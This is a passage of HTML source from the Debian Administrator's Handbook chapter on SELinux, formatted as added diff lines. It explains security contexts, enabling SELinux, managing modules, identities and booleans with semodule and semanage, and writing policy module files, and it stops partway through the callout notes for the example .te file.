+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.5. Introduction to SELinux</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.apparmor.html"
+        title="14.4. Introduction to AppArmor" /><link
+        rel="next"
+        href="sect.other-security-considerations.html"
+        title="14.6. Other Security-Related Considerations" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.selinux.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apparmor.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-security-considerations.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.selinux"></a>14.5. Introduction to SELinux</h2></div></div></div><a
+          id="id-1.17.8.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-principles"></a>14.5.1. Principles</h3></div></div></div><div
+            class="para">
+				SELinux (<span
+              class="emphasis"><em>Security Enhanced Linux</em></span>) is a <span
+              class="emphasis"><em>Mandatory Access Control</em></span> system built on Linux's LSM (<span
+              class="emphasis"><em>Linux Security Modules</em></span>) interface. In practice, the kernel queries SELinux before each system call to know whether the process is authorized to do the given operation.
+			</div><div
+            class="para">
+				SELinux uses a set of rules — collectively known as a <span
+              class="emphasis"><em>policy</em></span> — to authorize or forbid operations. Those rules are difficult to create. Fortunately, two standard policies (<span
+              class="emphasis"><em>targeted</em></span> and <span
+              class="emphasis"><em>strict</em></span>) are provided to avoid the bulk of the configuration work.
+			</div><div
+            class="para">
+				With SELinux, the management of rights is completely different from traditional Unix systems. The rights of a process depend on its <span
+              class="emphasis"><em>security context</em></span>. The context is defined by the <span
+              class="emphasis"><em>identity</em></span> of the user who started the process, the <span
+              class="emphasis"><em>role</em></span> and the <span
+              class="emphasis"><em>domain</em></span> that the user carried at that time. The rights really depend on the domain, but the transitions between domains are controlled by the roles. Finally, the possible transitions between roles depend on the identity.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.17.8.3.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/selinux-context.png"
+                  alt="Security contexts and Unix users" /></div></div><p
+              class="title"><strong>Obrázek 14.3. Security contexts and Unix users</strong></p></div><div
+            class="para">
+				In practice, during login, the user gets assigned a default security context (depending on the roles that they should be able to endorse). This defines the current domain, and thus the domain that all new child processes will carry. If you want to change the current role and its associated domain, you must call <code
+              class="command">newrole -r <em
+                class="replaceable">role_r</em> -t <em
+                class="replaceable">domain_t</em></code> (there's usually only a single domain allowed for a given role, the <code
+              class="literal">-t</code> parameter can thus often be left out). This command authenticates you by asking you to type your password. This feature forbids programs to automatically switch roles. Such changes can only happen if they are explicitly allowed in the SELinux policy.
+			</div><div
+            class="para">
+				Obviously the rights do not apply to all <span
+              class="emphasis"><em>objects</em></span> (files, directories, sockets, devices, etc.). They can vary from object to object. To achieve this, each object is associated to a <span
+              class="emphasis"><em>type</em></span> (this is known as labeling). Domains' rights are thus expressed with sets of (dis)allowed operations on those types (and, indirectly, on all objects which are labeled with the given type).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>EXTRA</em></span> Domains and types are equivalent</strong></p></div></div></div><div
+              class="para">
+				Internally, a domain is just a type, but a type that only applies to processes. That's why domains are suffixed with <code
+                class="literal">_t</code> just like objects' types.
+			</div></div><div
+            class="para">
+				By default, a program inherits its domain from the user who started it, but the standard SELinux policies expect many important programs to run in dedicated domains. To achieve this, those executables are labeled with a dedicated type (for example <code
+              class="command">ssh</code> is labeled with <code
+              class="literal">ssh_exec_t</code>, and when the program starts, it automatically switches to the <code
+              class="literal">ssh_t</code> domain). This automatic domain transition mechanism makes it possible to grant only the rights required by each program. It is a fundamental principle of SELinux.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.17.8.3.10"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/selinux-transitions.png"
+                  alt="Automatic transitions between domains" /></div></div><p
+              class="title"><strong>Obrázek 14.4. Automatic transitions between domains</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Finding the security context</strong></p></div></div></div><a
+              id="id-1.17.8.3.11.2"
+              class="indexterm"></a><a
+              id="id-1.17.8.3.11.3"
+              class="indexterm"></a><a
+              id="id-1.17.8.3.11.4"
+              class="indexterm"></a><div
+              class="para">
+				To find the security context of a given process, you should use the <code
+                class="literal">Z</code> option of <code
+                class="command">ps</code>.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ps axZ | grep vstfpd</code></strong>
+<code
+                class="computeroutput">system_u:system_r:ftpd_t:s0   2094 ?    Ss  0:00 /usr/sbin/vsftpd</code></pre><div
+              class="para">
+				The first field contains the identity, the role, the domain and the MCS level, separated by colons. The MCS level (<span
+                class="emphasis"><em>Multi-Category Security</em></span>) is a parameter that intervenes in the setup of a confidentiality protection policy, which regulates the access to files based on their sensitivity. This feature will not be explained in this book.
+			</div><div
+              class="para">
+				To find the current security context in a shell, you should call <code
+                class="command">id -Z</code>.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>id -Z</code></strong>
+<code
+                class="computeroutput">unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</code></pre><div
+              class="para">
+				Finally, to find the type assigned to a file, you can use <code
+                class="command">ls -Z</code>.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls -Z test /usr/bin/ssh</code></strong>
+<code
+                class="computeroutput">unconfined_u:object_r:user_home_t:s0 test
+     system_u:object_r:ssh_exec_t:s0 /usr/bin/ssh</code></pre><div
+              class="para">
+				It is worth noting that the identity and role assigned to a file bear no special importance (they are never used), but for the sake of uniformity, all objects get assigned a complete security context.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-setup"></a>14.5.2. Setting Up SELinux</h3></div></div></div><div
+            class="para">
+				SELinux support is built into the standard kernels provided by Debian. The core Unix tools support SELinux without any modifications. It is thus relatively easy to enable SELinux.
+			</div><div
+            class="para">
+				The <code
+              class="command">apt install selinux-basics selinux-policy-default</code> command will automatically install the packages required to configure an SELinux system.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Reference policy not in jessie</strong></p></div></div></div><div
+              class="para">
+				Unfortunately the maintainers of the <span
+                class="pkg pkg">refpolicy</span> source package did not handle release critical bugs on their package and the package got removed from jessie. This means that the <span
+                class="pkg pkg">selinux-policy-*</span> packages are currently not installable in jessie and need to be fetched from another place. Hopefully they will come back in one of the point releases or in jessie-backports. In the meantime, you can grab them from unstable.
+			</div><div
+              class="para">
+				This sad situation at least proves that SELinux is not very popular in the set of users/developers who are running the development versions of Debian. Thus, if you opt to use SELinux, you should expect the default policy to not work perfectly and you will have to invest quite some time to make it suitable to your specific needs.
+			</div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">selinux-policy-default</span> package contains a set of standard rules. By default, this policy only restricts access for a few widely exposed services. The user sessions are not restricted and it is thus unlikely that SELinux would block legitimate user operations. However, this does enhance the security of system services running on the machine. To setup a policy equivalent to the old “strict” rules, you just have to disable the <code
+              class="literal">unconfined</code> module (modules management is detailed further in this section).
+			</div><div
+            class="para">
+				Once the policy has been installed, you should label all the available files (which means assigning them a type). This operation must be manually started with <code
+              class="command">fixfiles relabel</code>.
+			</div><div
+            class="para">
+				The SELinux system is now ready. To enable it, you should add the <code
+              class="literal">selinux=1 security=selinux</code> parameter to the Linux kernel. The <code
+              class="literal">audit=1</code> parameter enables SELinux logging which records all the denied operations. Finally, the <code
+              class="literal">enforcing=1</code> parameter brings the rules into application: without it SELinux works in its default <span
+              class="emphasis"><em>permissive</em></span> mode where denied actions are logged but still executed. You should thus modify the GRUB bootloader configuration file to append the desired parameters. One easy way to do this is to modify the <code
+              class="literal">GRUB_CMDLINE_LINUX</code> variable in <code
+              class="filename">/etc/default/grub</code> and to run <code
+              class="command">update-grub</code>. SELinux will be active after a reboot.
+			</div><div
+            class="para">
+				It is worth noting that the <code
+              class="command">selinux-activate</code> script automates those operations and forces a labeling on next boot (which avoids new non-labeled files created while SELinux was not yet active and while the labeling was going on).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-management"></a>14.5.3. Managing an SELinux System</h3></div></div></div><a
+            id="id-1.17.8.5.2"
+            class="indexterm"></a><a
+            id="id-1.17.8.5.3"
+            class="indexterm"></a><div
+            class="para">
+				The SELinux policy is a modular set of rules, and its installation detects and enables automatically all the relevant modules based on the already installed services. The system is thus immediately operational. However, when a service is installed after the SELinux policy, you must be able to manually enable the corresponding module. That is the purpose of the <code
+              class="command">semodule</code> command. Furthermore, you must be able to define the roles that each user can endorse, and this can be done with the <code
+              class="command">semanage</code> command.
+			</div><div
+            class="para">
+				Those two commands can thus be used to modify the current SELinux configuration, which is stored in <code
+              class="filename">/etc/selinux/default/</code>. Unlike other configuration files that you can find in <code
+              class="filename">/etc/</code>, all those files must not be changed by hand. You should use the programs designed for this purpose.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> More documentation</strong></p></div></div></div><div
+              class="para">
+				Since the NSA doesn't provide any official documentation, the community set up a wiki to compensate. It brings together a lot of information, but you must be aware that most SELinux contributors are Fedora users (where SELinux is enabled by default). The documentation thus tends to deal specifically with that distribution. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.selinuxproject.org">http://www.selinuxproject.org</a></div>
+			</div><div
+              class="para">
+				You should also have a look at the dedicated Debian wiki page as well as Russell Coker's blog, who is one of the most active Debian developers working on SELinux support. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.debian.org/SELinux">http://wiki.debian.org/SELinux</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://etbe.coker.com.au/tag/selinux/">http://etbe.coker.com.au/tag/selinux/</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.5.7"></a>14.5.3.1. Managing SELinux Modules</h4></div></div></div><div
+              class="para">
+					Available SELinux modules are stored in the <code
+                class="filename">/usr/share/selinux/default/</code> directory. To enable one of these modules in the current configuration, you should use <code
+                class="command">semodule -i <em
+                  class="replaceable">module.pp.bz2</em></code>. The <span
+                class="emphasis"><em>pp.bz2</em></span> extension stands for <span
+                class="emphasis"><em>policy package</em></span> (compressed with bzip2).
+				</div><div
+              class="para">
+					Removing a module from the current configuration is done with <code
+                class="command">semodule -r <em
+                  class="replaceable">module</em></code>. Finally, the <code
+                class="command">semodule -l</code> command lists the modules which are currently installed. It also outputs their version numbers. Modules can be selectively enabled with <code
+                class="command">semodule -e</code> and disabled with <code
+                class="command">semodule -d</code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -i /usr/share/selinux/default/abrt.pp.bz2</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -l</code></strong>
+<code
+                class="computeroutput">abrt    1.5.0   Disabled
+accountsd       1.1.0   
+acct    1.6.0   
+[...]</code>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -e abrt</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -d accountsd</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -l</code></strong>
+<code
+                class="computeroutput">abrt    1.5.0
+accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</code>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -r abrt</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -l</code></strong>
+<code
+                class="computeroutput">accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</code></pre><div
+              class="para">
+					<code
+                class="command">semodule</code> immediately loads the new configuration unless you use its <code
+                class="literal">-n</code> option. It is worth noting that the program acts by default on the current configuration (which is indicated by the <code
+                class="literal">SELINUXTYPE</code> variable in <code
+                class="filename">/etc/selinux/config</code>), but that you can modify another one by specifying it with the <code
+                class="literal">-s</code> option.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.5.8"></a>14.5.3.2. Managing Identities</h4></div></div></div><div
+              class="para">
+					Every time that a user logs in, they get assigned an SELinux identity. This identity defines the roles that they will be able to endorse. Those two mappings (from the user to the identity and from this identity to roles) are configurable with the <code
+                class="command">semanage</code> command.
+				</div><div
+              class="para">
+					You should definitely read the <span
+                class="citerefentry"><span
+                  class="refentrytitle">semanage</span>(8)</span> manual page, even if the command's syntax tends to be similar for all the concepts which are managed. You will find common options to all sub-commands: <code
+                class="literal">-a</code> to add, <code
+                class="literal">-d</code> to delete, <code
+                class="literal">-m</code> to modify, <code
+                class="literal">-l</code> to list, and <code
+                class="literal">-t</code> to indicate a type (or domain).
+				</div><div
+              class="para">
+					<code
+                class="command">semanage login -l</code> lists the current mapping between user identifiers and SELinux identities. Users that have no explicit entry get the identity indicated in the <code
+                class="literal">__default__</code> entry. The <code
+                class="command">semanage login -a -s user_u <em
+                  class="replaceable">user</em></code> command will associate the <span
+                class="emphasis"><em>user_u</em></span> identity to the given user. Finally, <code
+                class="command">semanage login -d <em
+                  class="replaceable">user</em></code> drops the mapping entry assigned to this user.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage login -a -s user_u rhertzog</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage login -l</code></strong>
+<code
+                class="computeroutput">
+Login Name           SELinux User         MLS/MCS Range        Service
+
+__default__          unconfined_u         SystemLow-SystemHigh *
+rhertzog             user_u               SystemLow            *
+root                 unconfined_u         SystemLow-SystemHigh *
+system_u             system_u             SystemLow-SystemHigh *
+# </code><strong
+                class="userinput"><code>semanage login -d rhertzog</code></strong></pre><div
+              class="para">
+					<code
+                class="command">semanage user -l</code> lists the mapping between SELinux user identities and allowed roles. Adding a new identity requires to define both the corresponding roles and a labeling prefix which is used to assign a type to personal files (<code
+                class="filename">/home/<em
+                  class="replaceable">user</em>/*</code>). The prefix must be picked among <code
+                class="literal">user</code>, <code
+                class="literal">staff</code>, and <code
+                class="literal">sysadm</code>. The “<code
+                class="literal">staff</code>” prefix results in files of type “<code
+                class="literal">staff_home_dir_t</code>”. Creating a new SELinux user identity is done with <code
+                class="command">semanage user -a -R <em
+                  class="replaceable">roles</em> -P <em
+                  class="replaceable">prefix</em> <em
+                  class="replaceable">identity</em></code>. Finally, you can remove an SELinux user identity with <code
+                class="command">semanage user -d <em
+                  class="replaceable">identity</em></code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage user -a -R 'staff_r user_r' -P staff test_u</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage user -l</code></strong>
+<code
+                class="computeroutput">
+                Labeling   MLS/       MLS/                          
+SELinux User    Prefix     MCS Level  MCS Range             SELinux Roles
+
+root            sysadm     SystemLow  SystemLow-SystemHigh  staff_r sysadm_r system_r
+staff_u         staff      SystemLow  SystemLow-SystemHigh  staff_r sysadm_r
+sysadm_u        sysadm     SystemLow  SystemLow-SystemHigh  sysadm_r
+system_u        user       SystemLow  SystemLow-SystemHigh  system_r
+test_u          staff      SystemLow  SystemLow             staff_r user_r
+unconfined_u    unconfined SystemLow  SystemLow-SystemHigh  system_r unconfined_r
+user_u          user       SystemLow  SystemLow             user_r
+# </code><strong
+                class="userinput"><code>semanage user -d test_u</code></strong></pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.5.9"></a>14.5.3.3. Managing File Contexts, Ports and Booleans</h4></div></div></div><div
+              class="para">
+					Each SELinux module provides a set of file labeling rules, but it is also possible to add custom labeling rules to cater to a specific case. For example, if you want the web server to be able to read files within the <code
+                class="filename">/srv/www/</code> file hierarchy, you could execute <code
+                class="command">semanage fcontext -a -t httpd_sys_content_t "/srv/www(/.*)?"</code> followed by <code
+                class="command">restorecon -R /srv/www/</code>. The former command registers the new labeling rules and the latter resets the file types according to the current labeling rules.
+				</div><div
+              class="para">
+					Similarly, TCP/UDP ports are labeled in a way that ensures that only the corresponding daemons can listen to them. For instance, if you want the web server to be able to listen on port 8080, you should run <code
+                class="command">semanage port -m -t http_port_t -p tcp 8080</code>.
+				</div><div
+              class="para">
+					Some SELinux modules export boolean options that you can tweak to alter the behavior of the default rules. The <code
+                class="command">getsebool</code> utility can be used to inspect those options (<code
+                class="command">getsebool <em
+                  class="replaceable">boolean</em></code> displays one option, and <code
+                class="command">getsebool -a</code> them all). The <code
+                class="command">setsebool <em
+                  class="replaceable">boolean</em> <em
+                  class="replaceable">value</em></code> command changes the current value of a boolean option. The <code
+                class="literal">-P</code> option makes the change permanent, it means that the new value becomes the default and will be kept across reboots. The example below grants web servers an access to home directories (this is useful when users have personal websites in <code
+                class="filename">~/public_html/</code>).
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>getsebool httpd_enable_homedirs</code></strong>
+<code
+                class="computeroutput">httpd_enable_homedirs --&gt; off
+# </code><strong
+                class="userinput"><code>setsebool -P httpd_enable_homedirs on</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>getsebool httpd_enable_homedirs</code></strong> 
+<code
+                class="computeroutput">httpd_enable_homedirs --&gt; on</code></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-custom-rules"></a>14.5.4. Adapting the Rules</h3></div></div></div><div
+            class="para">
+				Since the SELinux policy is modular, it might be interesting to develop new modules for (possibly custom) applications that lack them. These new modules will then complete the <span
+              class="emphasis"><em>reference policy</em></span>.
+			</div><div
+            class="para">
+				To create new modules, the <span
+              class="pkg pkg">selinux-policy-dev</span> package is required, as well as <span
+              class="pkg pkg">selinux-policy-doc</span>. The latter contains the documentation of the standard rules (<code
+              class="filename">/usr/share/doc/selinux-policy-doc/html/</code>) and sample files that can be used as templates to create new modules. Install those files and study them more closely:
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/Makefile.example Makefile</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/example.fc ./</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/example.if ./</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/example.te ./</code></strong></pre><div
+            class="para">
+				The <code
+              class="filename">.te</code> file is the most important one. It defines the rules. The <code
+              class="filename">.fc</code> file defines the “file contexts”, that is the types assigned to files related to this module. The data within the <code
+              class="filename">.fc</code> file are used during the file labeling step. Finally, the <code
+              class="filename">.if</code> file defines the interface of the module: it is a set of “public functions” that other modules can use to properly interact with the module that you're creating.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.6.6"></a>14.5.4.1. Writing a <code
+                      class="filename">.fc</code> file</h4></div></div></div><div
+              class="para">
+					Reading the below example should be sufficient to understand the structure of such a file. You can use regular expressions to assign the same security context to multiple files, or even an entire directory tree.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.17.8.6.6.3"></a><p
+                class="title"><strong>Příklad 14.2. <code
+                    class="filename">example.fc</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting scale"># myapp executable will have:
+# label: system_u:object_r:myapp_exec_t
+# MLS sensitivity: s0
+# MCS categories: &lt;none&gt;
+
+/usr/sbin/myapp         --      gen_context(system_u:object_r:myapp_exec_t,s0)
+</pre></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.6.7"></a>14.5.4.2. Writing a <code
+                      class="filename">.if</code> File</h4></div></div></div><div
+              class="para">
+					In the sample below, the first interface (“<code
+                class="literal">myapp_domtrans</code>”) controls who can execute the application. The second one (“<code
+                class="literal">myapp_read_log</code>”) grants read rights on the application's log files.
+				</div><div
+              class="para">
+					Each interface must generate a valid set of rules which can be embedded in a <code
+                class="filename">.te</code> file. You should thus declare all the types that you use (with the <code
+                class="literal">gen_require</code> macro), and use standard directives to grant rights. Note, however, that you can use interfaces provided by other modules. The next section will give more explanations about how to express those rights.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.17.8.6.7.4"></a><p
+                class="title"><strong>Příklad 14.3. <code
+                    class="filename">example.if</code> File</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">## &lt;summary&gt;Myapp example policy&lt;/summary&gt;
+## &lt;desc&gt;
+##      &lt;p&gt;
+##              More descriptive text about myapp.  The &lt;desc&gt;
+##              tag can also use &lt;p&gt;, &lt;ul&gt;, and &lt;ol&gt;
+##              html tags for formatting.
+##      &lt;/p&gt;
+##      &lt;p&gt;
+##              This policy supports the following myapp features:
+##              &lt;ul&gt;
+##              &lt;li&gt;Feature A&lt;/li&gt;
+##              &lt;li&gt;Feature B&lt;/li&gt;
+##              &lt;li&gt;Feature C&lt;/li&gt;
+##              &lt;/ul&gt;
+##      &lt;/p&gt;
+## &lt;/desc&gt;
+#
+
+########################################
+## &lt;summary&gt;
+##      Execute a domain transition to run myapp.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to transition.
+## &lt;/param&gt;
+#
+interface(`myapp_domtrans',`
+        gen_require(`
+                type myapp_t, myapp_exec_t;
+        ')
+
+        domtrans_pattern($1,myapp_exec_t,myapp_t)
+')
+
+########################################
+## &lt;summary&gt;
+##      Read myapp log files.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to read the log files.
+## &lt;/param&gt;
+#
+interface(`myapp_read_log',`
+        gen_require(`
+                type myapp_log_t;
+        ')
+
+        logging_search_logs($1)
+        allow $1 myapp_log_t:file r_file_perms;
+')
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DOCUMENTATION</em></span> Explanations about the <span
+                          class="emphasis"><em>reference policy</em></span></strong></p></div></div></div><div
+                class="para">
+					The <span
+                  class="emphasis"><em>reference policy</em></span> evolves like any free software project: based on volunteer contributions. The project is hosted by Tresys, one of the most active companies in the SELinux field. Their wiki contains explanations on how the rules are structured and how you can create new ones. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://github.com/TresysTechnology/refpolicy/wiki/GettingStarted">https://github.com/TresysTechnology/refpolicy/wiki/GettingStarted</a></div>
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.writing-a-te-file"></a>14.5.4.3. Writing a <code
+                      class="filename">.te</code> File</h4></div></div></div><div
+              class="para">
+					Have a look at the <code
+                class="filename">example.te</code> file:
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> The <code
+                          class="command">m4</code> macro language</strong></p></div></div></div><div
+                class="para">
+					To properly structure the policy, the SELinux developers used a macro-command processor. Instead of duplicating many similar <span
+                  class="emphasis"><em>allow</em></span> directives, they created “macro functions” to use a higher-level logic, which also results in a much more readable policy.
+				</div><div
+                class="para">
+					In practice, <code
+                  class="command">m4</code> is used to compile those rules. It does the opposite operation: it expands all those high-level directives into a huge database of <span
+                  class="emphasis"><em>allow</em></span> directives.
+				</div><div
+                class="para">
+					The SELinux “interfaces” are only macro functions which will be substituted by a set of rules at compilation time. Likewise, some rights are in fact sets of rights which are replaced by their values at compilation time.
+				</div></div><pre
+              class="programlisting">policy_module(myapp,1.0.0) <span
+                id="example.te.module"><img
+                  class="callout"
+                  src="Common_Content/images/1.png"
+                  alt="1" /></span>
+
+########################################
+#
+# Declarations
+#
+
+type myapp_t; <span
+                id="example.te.type"><img
+                  class="callout"
+                  src="Common_Content/images/2.png"
+                  alt="2" /></span>
+type myapp_exec_t;
+domain_type(myapp_t)
+domain_entry_file(myapp_t, myapp_exec_t) <span
+                id="example.te.domain"><img
+                  class="callout"
+                  src="Common_Content/images/3.png"
+                  alt="3" /></span>
+
+type myapp_log_t;
+logging_log_file(myapp_log_t) <span
+                id="example.te.interface"><img
+                  class="callout"
+                  src="Common_Content/images/4.png"
+                  alt="4" /></span>
+
+type myapp_tmp_t;
+files_tmp_file(myapp_tmp_t)
+
+########################################
+#
+# Myapp local policy
+#
+
+allow myapp_t myapp_log_t:file { read_file_perms append_file_perms }; <span
+                id="example.te.allow"><img
+                  class="callout"
+                  src="Common_Content/images/5.png"
+                  alt="5" /></span>
+
+allow myapp_t myapp_tmp_t:file manage_file_perms;
+files_tmp_filetrans(myapp_t,myapp_tmp_t,file)
+</pre><div
+              class="calloutlist"><table
+                border="0"
+                summary="Callout list"><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.module"><img
+                          class="callout"
+                          src="Common_Content/images/1.png"
+                          alt="1" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The module must be identified by its name and version number. This directive is required.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.type"><img
+                          class="callout"
+                          src="Common_Content/images/2.png"
+                          alt="2" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							If the module introduces new types, it must declare them with directives like this one. Do not hesitate to create as many types as required rather than granting too many useless rights.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.domain"><img
+                          class="callout"
+                          src="Common_Content/images/3.png"
+                          alt="3" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							Those interfaces define the <code
+                        class="literal">myapp_t</code> type as a process domain that should be used by any executable labeled with <code
+                        class="literal">myapp_exec_t</code>. Implicitly, this adds an <code
+                        class="literal">exec_type</code> attribute on those objects, which in turn allows other modules to grant rights to execute those programs: for instance, the <code
+                        class="literal">userdomain</code> module allows processes with domains <code
+                        class="literal">user_t</code>, <code
+                        class="literal">staff_t</code>, and <code
+                        class="literal">sysadm_t</code> to execute them. The domains of other confined applications will not have the rights to execute them, unless the rules grant them similar rights (this is the case, for example, of <code
+                        class="command">dpkg</code> with its <code
+                        class="literal">dpkg_t</code> domain).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.interface"><img
+                          class="callout"
+                          src="Common_Content/images/4.png"
+                          alt="4" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							<code
+                        class="literal">logging_log_file</code> is an interface provided by the reference policy. It indicates that files labeled with the given type are log files which ought to benefit from the associated rules (for example granting rights to <code
+                        class="command">logrotate</code> so that it can manipulate them).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.allow"><img
+                          class="callout"
+                          src="Common_Content/images/5.png"
+                          alt="5" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">allow</code> directive is the base directive used to authorize an operation. The first parameter is the process domain which is allowed to execute the operation. The second one defines the object that a process of the former domain can manipulate. This parameter is of the form “<em
+                        class="replaceable">type</em>:<em
+                        class="replaceable">class</em>“ where <em
+                        class="replaceable">type</em> is its SELinux type and <em
